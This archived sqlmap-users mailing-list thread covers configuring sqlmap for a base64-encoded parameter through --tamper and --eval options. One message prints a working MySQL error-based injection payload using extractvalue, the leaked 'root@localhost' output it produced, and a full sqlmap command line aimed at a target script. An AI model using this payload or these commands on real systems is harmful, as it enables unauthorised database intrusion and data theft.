Thread: [sqlmap-users] Where in the kb/conf.parameters does sqlmap store parsed variables?
Brought to you by:
inquisb
Menu
▾
▴
sqlmap-users
|
From: Konrads S. <ko...@sm...> - 2014-10-30 12:31:53
|
Hello, I am writing a small modification which would allow to tamper/decode variables in the request? As I understand that the parameters are decoded/parsed into a dict after option.py:2323 (parseTargetDirect()), but where can I access the full, parsed dict of the get/post/cookie values? (specifically I have a base64 encoded string as a parameter and to insert the payload, the parameter must be base64-decoded, injected and then encoded back) -- Konrads Smelkovs Applied IT sorcery. |
|
From: Miroslav S. <mir...@gm...> - 2014-10-30 13:12:24
|
Hi. In your case I would do this: 1) Decode original base64 value and give it to the sqlmap in decoded form (e.g. id=123 instead of original id=313233) 2) Use --tamper=base64encode Kind regards, Miroslav Stampar On Thu, Oct 30, 2014 at 1:15 PM, Konrads Smelkovs <ko...@sm...> wrote: > Hello, > > I am writing a small modification which would allow to tamper/decode > variables in the request? > As I understand that the parameters are decoded/parsed into a dict > after option.py:2323 (parseTargetDirect()), but where can I access the > full, parsed dict of the get/post/cookie values? > > (specifically I have a base64 encoded string as a parameter and to > insert the payload, the parameter must be base64-decoded, injected and > then encoded back) > > > -- > Konrads Smelkovs > Applied IT sorcery. > > > ------------------------------------------------------------------------------ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar http://about.me/stamparm |
|
From: Konrads S. <ko...@sm...> - 2014-11-02 16:42:37
|
Miroslav, I previously exploited this manually. The injection occurs in the mysql INSERT statement. If the statement is invalid, we get an error message in html comments like so: <!--You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''lalalaa))) or'')' at line 1--> Which then is exploitable using some well documented methods such as appending string like this: ' or extractvalue(1,concat(0x7e,(SELECT user()))) or' which gives us a nice error: <!--XPATH syntax error: '~root@localhost'--> Anyhow, I got halfway there with the following string: sqlmap -u ' https://target/script.php?data=DATA:User=Test,CC=4512634722348842,CVV=1337' --tamper=base64encode --dbms=mysql -v 3 --proxy=http://localhost:8080 sqlmap sends correctly encoded test vectors, but it doesn't send the correct initial URL stability check vector: 1st request URL: https://target/script.php?data=DATA:User=Test,CC=4512634722348842,CVV=1337 2nd request URL: https://target/script.php? data=REFUQTpVc2VyPVRlc3QsQ0M9NDUxMjYzNDcyMjM0ODg0MixDVlY9MTMzNy4uIlsnJ1suKSg%3D Also none of the test vectors seem to trigger an error response. I tried with --risk=3 with no avail. version: 1.0-dev-1ef2c40 -- Konrads Smelkovs Applied IT sorcery. On 30 October 2014 13:12, Miroslav Stampar <mir...@gm...> wrote: > Hi. > > In your case I would do this: > > 1) Decode original base64 value and give it to the sqlmap in decoded form > (e.g. id=123 instead of original id=313233) > 2) Use --tamper=base64encode > > Kind regards, > Miroslav Stampar > > On Thu, Oct 30, 2014 at 1:15 PM, Konrads Smelkovs <ko...@sm...> > wrote: > >> Hello, >> >> I am writing a small modification which would allow to tamper/decode >> variables in the request? >> As I understand that the parameters are decoded/parsed into a dict >> after option.py:2323 (parseTargetDirect()), but where can I access the >> full, parsed dict of the get/post/cookie values? >> >> (specifically I have a base64 encoded string as a parameter and to >> insert the payload, the parameter must be base64-decoded, injected and >> then encoded back) >> >> >> -- >> Konrads Smelkovs >> Applied IT sorcery. >> >> >> ------------------------------------------------------------------------------ >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > > > > -- > Miroslav Stampar > http://about.me/stamparm > |
|
From: Miroslav S. <mir...@gm...> - 2014-11-02 17:10:35
|
Then please try --eval instead of --tamper.
E.g. --eval="param=param.encode('base64')"
Bye
On Nov 2, 2014 5:42 PM, "Konrads Smelkovs" <ko...@sm...> wrote:
> Miroslav,
>
> I previously exploited this manually. The injection occurs in the mysql
> INSERT statement. If the statement is invalid, we get an error message in
> html comments like so:
>
> <!--You have an error in your SQL syntax; check the manual that
> corresponds to your MySQL server version for the right syntax to use near
> ''lalalaa))) or'')' at line 1-->
>
> Which then is exploitable using some well documented methods such as
> appending string like this:
> ' or extractvalue(1,concat(0x7e,(SELECT user()))) or'
>
> which gives us a nice error:
> <!--XPATH syntax error: '~root@localhost'-->
>
>
> Anyhow, I got halfway there with the following string:
> sqlmap -u '
> https://target/script.php?data=DATA:User=Test,CC=4512634722348842,CVV=1337'
> --tamper=base64encode --dbms=mysql -v 3 --proxy=http://localhost:8080
> sqlmap sends correctly encoded test vectors, but it doesn't send the
> correct initial URL stability check vector:
>
> 1st request URL:
> https://target/script.php?data=DATA:User=Test,CC=4512634722348842,CVV=1337
> 2nd request URL: https://target/script.php?
> data=REFUQTpVc2VyPVRlc3QsQ0M9NDUxMjYzNDcyMjM0ODg0MixDVlY9MTMzNy4uIlsnJ1suKSg%3D
>
> Also none of the test vectors seem to trigger an error response.
>
> I tried with --risk=3 with no avail.
>
> version: 1.0-dev-1ef2c40
>
> --
> Konrads Smelkovs
> Applied IT sorcery.
>
> On 30 October 2014 13:12, Miroslav Stampar <mir...@gm...>
> wrote:
>
>> Hi.
>>
>> In your case I would do this:
>>
>> 1) Decode original base64 value and give it to the sqlmap in decoded form
>> (e.g. id=123 instead of original id=313233)
>> 2) Use --tamper=base64encode
>>
>> Kind regards,
>> Miroslav Stampar
>>
>> On Thu, Oct 30, 2014 at 1:15 PM, Konrads Smelkovs <ko...@sm...>
>> wrote:
>>
>>> Hello,
>>>
>>> I am writing a small modification which would allow to tamper/decode
>>> variables in the request?
>>> As I understand that the parameters are decoded/parsed into a dict
>>> after option.py:2323 (parseTargetDirect()), but where can I access the
>>> full, parsed dict of the get/post/cookie values?
>>>
>>> (specifically I have a base64 encoded string as a parameter and to
>>> insert the payload, the parameter must be base64-decoded, injected and
>>> then encoded back)
>>>
>>>
>>> --
>>> Konrads Smelkovs
>>> Applied IT sorcery.
>>>
>>>
>>> ------------------------------------------------------------------------------
>>> _______________________________________________
>>> sqlmap-users mailing list
>>> sql...@li...
>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>
>>
>>
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm
>>
>
>
|
|
From: Konrads S. <ko...@sm...> - 2014-11-03 07:29:32
|
Cheers, works!
--
Konrads Smelkovs
Applied IT sorcery.
On 2 November 2014 17:10, Miroslav Stampar <mir...@gm...>
wrote:
> Then please try --eval instead of --tamper.
>
> E.g. --eval="param=param.encode('base64')"
>
> Bye
> On Nov 2, 2014 5:42 PM, "Konrads Smelkovs" <ko...@sm...> wrote:
>
>> Miroslav,
>>
>> I previously exploited this manually. The injection occurs in the mysql
>> INSERT statement. If the statement is invalid, we get an error message in
>> html comments like so:
>>
>> <!--You have an error in your SQL syntax; check the manual that
>> corresponds to your MySQL server version for the right syntax to use near
>> ''lalalaa))) or'')' at line 1-->
>>
>> Which then is exploitable using some well documented methods such as
>> appending string like this:
>> ' or extractvalue(1,concat(0x7e,(SELECT user()))) or'
>>
>> which gives us a nice error:
>> <!--XPATH syntax error: '~root@localhost'-->
>>
>>
>> Anyhow, I got halfway there with the following string:
>> sqlmap -u '
>> https://target/script.php?data=DATA:User=Test,CC=4512634722348842,CVV=1337'
>> --tamper=base64encode --dbms=mysql -v 3 --proxy=http://localhost:8080
>> sqlmap sends correctly encoded test vectors, but it doesn't send the
>> correct initial URL stability check vector:
>>
>> 1st request URL:
>> https://target/script.php?data=DATA:User=Test,CC=4512634722348842,CVV=1337
>> 2nd request URL: https://target/script.php?
>> data=REFUQTpVc2VyPVRlc3QsQ0M9NDUxMjYzNDcyMjM0ODg0MixDVlY9MTMzNy4uIlsnJ1suKSg%3D
>>
>> Also none of the test vectors seem to trigger an error response.
>>
>> I tried with --risk=3 with no avail.
>>
>> version: 1.0-dev-1ef2c40
>>
>> --
>> Konrads Smelkovs
>> Applied IT sorcery.
>>
>> On 30 October 2014 13:12, Miroslav Stampar <mir...@gm...>
>> wrote:
>>
>>> Hi.
>>>
>>> In your case I would do this:
>>>
>>> 1) Decode original base64 value and give it to the sqlmap in decoded
>>> form (e.g. id=123 instead of original id=313233)
>>> 2) Use --tamper=base64encode
>>>
>>> Kind regards,
>>> Miroslav Stampar
>>>
>>> On Thu, Oct 30, 2014 at 1:15 PM, Konrads Smelkovs <ko...@sm...>
>>> wrote:
>>>
>>>> Hello,
>>>>
>>>> I am writing a small modification which would allow to tamper/decode
>>>> variables in the request?
>>>> As I understand that the parameters are decoded/parsed into a dict
>>>> after option.py:2323 (parseTargetDirect()), but where can I access the
>>>> full, parsed dict of the get/post/cookie values?
>>>>
>>>> (specifically I have a base64 encoded string as a parameter and to
>>>> insert the payload, the parameter must be base64-decoded, injected and
>>>> then encoded back)
>>>>
>>>>
>>>> --
>>>> Konrads Smelkovs
>>>> Applied IT sorcery.
>>>>
>>>>
>>>> ------------------------------------------------------------------------------
>>>> _______________________________________________
>>>> sqlmap-users mailing list
>>>> sql...@li...
>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>
>>>
>>>
>>>
>>> --
>>> Miroslav Stampar
>>> http://about.me/stamparm
>>>
>>
>>
|
|
From: Konrads S. <ko...@sm...> - 2014-11-03 20:20:54
|
Just as a note - I had to do data.encode("base64").strip() to remove the
newline which the encode adds.
--
Konrads Smelkovs
Applied IT sorcery.
On 3 November 2014 07:29, Konrads Smelkovs <ko...@sm...> wrote:
> Cheers, works!
>
> --
> Konrads Smelkovs
> Applied IT sorcery.
>
> On 2 November 2014 17:10, Miroslav Stampar <mir...@gm...>
> wrote:
>
>> Then please try --eval instead of --tamper.
>>
>> E.g. --eval="param=param.encode('base64')"
>>
>> Bye
>> On Nov 2, 2014 5:42 PM, "Konrads Smelkovs" <ko...@sm...> wrote:
>>
>>> Miroslav,
>>>
>>> I previously exploited this manually. The injection occurs in the mysql
>>> INSERT statement. If the statement is invalid, we get an error message in
>>> html comments like so:
>>>
>>> <!--You have an error in your SQL syntax; check the manual that
>>> corresponds to your MySQL server version for the right syntax to use near
>>> ''lalalaa))) or'')' at line 1-->
>>>
>>> Which then is exploitable using some well documented methods such as
>>> appending string like this:
>>> ' or extractvalue(1,concat(0x7e,(SELECT user()))) or'
>>>
>>> which gives us a nice error:
>>> <!--XPATH syntax error: '~root@localhost'-->
>>>
>>>
>>> Anyhow, I got halfway there with the following string:
>>> sqlmap -u '
>>> https://target/script.php?data=DATA:User=Test,CC=4512634722348842,CVV=1337'
>>> --tamper=base64encode --dbms=mysql -v 3 --proxy=http://localhost:8080
>>> sqlmap sends correctly encoded test vectors, but it doesn't send the
>>> correct initial URL stability check vector:
>>>
>>> 1st request URL:
>>> https://target/script.php?data=DATA:User=Test,CC=4512634722348842,CVV=1337
>>> 2nd request URL: https://target/script.php?
>>> data=REFUQTpVc2VyPVRlc3QsQ0M9NDUxMjYzNDcyMjM0ODg0MixDVlY9MTMzNy4uIlsnJ1suKSg%3D
>>>
>>> Also none of the test vectors seem to trigger an error response.
>>>
>>> I tried with --risk=3 with no avail.
>>>
>>> version: 1.0-dev-1ef2c40
>>>
>>> --
>>> Konrads Smelkovs
>>> Applied IT sorcery.
>>>
>>> On 30 October 2014 13:12, Miroslav Stampar <mir...@gm...>
>>> wrote:
>>>
>>>> Hi.
>>>>
>>>> In your case I would do this:
>>>>
>>>> 1) Decode original base64 value and give it to the sqlmap in decoded
>>>> form (e.g. id=123 instead of original id=313233)
>>>> 2) Use --tamper=base64encode
>>>>
>>>> Kind regards,
>>>> Miroslav Stampar
>>>>
>>>> On Thu, Oct 30, 2014 at 1:15 PM, Konrads Smelkovs <ko...@sm...
>>>> > wrote:
>>>>
>>>>> Hello,
>>>>>
>>>>> I am writing a small modification which would allow to tamper/decode
>>>>> variables in the request?
>>>>> As I understand that the parameters are decoded/parsed into a dict
>>>>> after option.py:2323 (parseTargetDirect()), but where can I access the
>>>>> full, parsed dict of the get/post/cookie values?
>>>>>
>>>>> (specifically I have a base64 encoded string as a parameter and to
>>>>> insert the payload, the parameter must be base64-decoded, injected and
>>>>> then encoded back)
>>>>>
>>>>>
>>>>> --
>>>>> Konrads Smelkovs
>>>>> Applied IT sorcery.
>>>>>
>>>>>
>>>>> ------------------------------------------------------------------------------
>>>>> _______________________________________________
>>>>> sqlmap-users mailing list
>>>>> sql...@li...
>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>>
>>>>
>>>>
>>>>
>>>> --
>>>> Miroslav Stampar
>>>> http://about.me/stamparm
>>>>
>>>
>>>
>
|
×
Want the latest updates on software, tech news, and AI?
Get latest updates about software, tech news, and AI from SourceForge directly in your inbox once a month.
Thanks for helping keep SourceForge clean.
X